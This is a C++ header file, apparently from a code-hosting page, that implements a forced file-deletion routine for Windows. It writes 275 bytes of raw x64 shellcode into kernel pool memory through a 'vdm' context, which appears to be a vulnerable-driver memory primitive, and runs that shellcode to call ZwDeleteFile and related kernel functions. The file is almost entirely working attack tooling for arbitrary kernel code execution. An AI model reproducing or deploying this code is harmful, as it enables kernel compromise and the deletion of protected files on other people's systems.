You can not select more than 25 topics
Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
92 lines
3.6 KiB
92 lines
3.6 KiB
#pragma once
|
|
#include "vdm_ctx/vdm_ctx.hpp"
|
|
|
|
namespace fdelete
|
|
{
|
|
typedef struct _import_struct_t
|
|
{
|
|
void* ObReferenceObjectByHandlePtr;
|
|
void* ObfDereferenceObjectPtr;
|
|
void* ZwClosePtr;
|
|
void* IoCreateFileSpecifyDeviceObjectHintPtr;
|
|
void* ZwDeleteFilePtr;
|
|
void* RtlInitUnicodeStringPtr;
|
|
} import_struct_t, *pimport_struct_t;
|
|
|
|
using entry_delete_t = NTSTATUS(*)(pimport_struct_t, const wchar_t* image_path);
|
|
using ex_allocate_t = void* (*)(std::uint16_t, std::size_t);
|
|
using ex_free_t = bool(*)(void*);
|
|
|
|
// NTSTATUS EntryDelete(PIMPORT_STRUCT Imports, PWCHAR ImagePath)
|
|
inline unsigned char shellcode[275] =
|
|
{
|
|
0x48, 0x89, 0x5C, 0x24, 0x10, 0x55, 0x48, 0x8D, 0x6C, 0x24, 0xA9, 0x48,
|
|
0x81, 0xEC, 0xD0, 0x00, 0x00, 0x00, 0x48, 0x83, 0x65, 0x67, 0x00, 0x48,
|
|
0x8B, 0xD9, 0x48, 0x8D, 0x4D, 0x07, 0xFF, 0x53, 0x28, 0x48, 0x83, 0x64,
|
|
0x24, 0x70, 0x00, 0x48, 0x8D, 0x45, 0x07, 0x48, 0x83, 0x65, 0x2F, 0x00,
|
|
0x4C, 0x8D, 0x4D, 0x17, 0xC7, 0x44, 0x24, 0x68, 0x00, 0x08, 0x00, 0x00,
|
|
0x4C, 0x8D, 0x45, 0x27, 0x48, 0x83, 0x64, 0x24, 0x60, 0x00, 0x48, 0x8D,
|
|
0x4D, 0x77, 0x83, 0x64, 0x24, 0x58, 0x00, 0x0F, 0x57, 0xC0, 0x83, 0x64,
|
|
0x24, 0x50, 0x00, 0xBA, 0x81, 0x01, 0x10, 0x00, 0x48, 0x83, 0x64, 0x24,
|
|
0x48, 0x00, 0xC7, 0x44, 0x24, 0x40, 0x60, 0x00, 0x00, 0x00, 0xC7, 0x44,
|
|
0x24, 0x38, 0x01, 0x00, 0x00, 0x00, 0xC7, 0x44, 0x24, 0x30, 0x07, 0x00,
|
|
0x00, 0x00, 0x83, 0x64, 0x24, 0x28, 0x00, 0x48, 0x83, 0x64, 0x24, 0x20,
|
|
0x00, 0x48, 0x89, 0x45, 0x37, 0x48, 0x8B, 0x43, 0x18, 0x0F, 0x11, 0x45,
|
|
0x17, 0xC7, 0x45, 0x27, 0x30, 0x00, 0x00, 0x00, 0xC7, 0x45, 0x3F, 0x40,
|
|
0x00, 0x00, 0x00, 0xF3, 0x0F, 0x7F, 0x45, 0x47, 0xFF, 0xD0, 0x85, 0xC0,
|
|
0x75, 0x58, 0x48, 0x83, 0x64, 0x24, 0x28, 0x00, 0x48, 0x8D, 0x4D, 0x67,
|
|
0x48, 0x8B, 0x03, 0x45, 0x33, 0xC9, 0x48, 0x89, 0x4C, 0x24, 0x20, 0x45,
|
|
0x33, 0xC0, 0x48, 0x8B, 0x4D, 0x77, 0x33, 0xD2, 0xFF, 0xD0, 0x85, 0xC0,
|
|
0x75, 0x34, 0x48, 0x8B, 0x45, 0x67, 0x48, 0x8B, 0x48, 0x28, 0x48, 0x83,
|
|
0x61, 0x10, 0x00, 0x48, 0x8D, 0x4D, 0x27, 0x48, 0x8B, 0x45, 0x67, 0xC6,
|
|
0x40, 0x4C, 0x01, 0x48, 0x8B, 0x43, 0x20, 0xFF, 0xD0, 0x85, 0xC0, 0x75,
|
|
0x11, 0x48, 0x8B, 0x4D, 0x67, 0xFF, 0x53, 0x08, 0x48, 0x8B, 0x43, 0x10,
|
|
0x48, 0x8B, 0x4D, 0x77, 0xFF, 0xD0, 0x48, 0x8B, 0x9C, 0x24, 0xE8, 0x00,
|
|
0x00, 0x00, 0x48, 0x81, 0xC4, 0xD0, 0x00, 0x00, 0x00, 0x5D, 0xC3
|
|
};
|
|
|
|
auto remove(vdm::vdm_ctx* vdm, const wchar_t* image_path) -> bool
|
|
{
|
|
static const auto ex_allocate_pool =
|
|
util::get_kmodule_export("ntoskrnl.exe", "ExAllocatePool");
|
|
|
|
static const auto ex_free_pool =
|
|
util::get_kmodule_export("ntoskrnl.exe", "ExFreePool");
|
|
|
|
static import_struct_t imports;
|
|
static std::once_flag once;
|
|
std::call_once(once, [&]()-> void
|
|
{
|
|
imports.IoCreateFileSpecifyDeviceObjectHintPtr =
|
|
util::get_kmodule_export("ntoskrnl.exe", "IoCreateFileSpecifyDeviceObjectHint");
|
|
|
|
imports.ObfDereferenceObjectPtr =
|
|
util::get_kmodule_export("ntoskrnl.exe", "ObfDereferenceObject");
|
|
|
|
imports.ObReferenceObjectByHandlePtr =
|
|
util::get_kmodule_export("ntoskrnl.exe", "ObReferenceObjectByHandle");
|
|
|
|
imports.RtlInitUnicodeStringPtr =
|
|
util::get_kmodule_export("ntoskrnl.exe", "RtlInitUnicodeString");
|
|
|
|
imports.ZwClosePtr =
|
|
util::get_kmodule_export("ntoskrnl.exe", "ZwClose");
|
|
|
|
imports.ZwDeleteFilePtr =
|
|
util::get_kmodule_export("ntoskrnl.exe", "ZwDeleteFile");
|
|
});
|
|
|
|
const auto shellcode_base =
|
|
vdm->syscall<ex_allocate_t>(
|
|
ex_allocate_pool, NULL, sizeof shellcode);
|
|
|
|
vdm->wkm(shellcode_base, shellcode, sizeof shellcode);
|
|
|
|
const auto result =
|
|
vdm->syscall<entry_delete_t>(
|
|
shellcode_base, &imports, image_path);
|
|
|
|
vdm->syscall<ex_free_t>(ex_free_pool, shellcode_base);
|
|
return result == STATUS_SUCCESS;
|
|
}
|
|
} |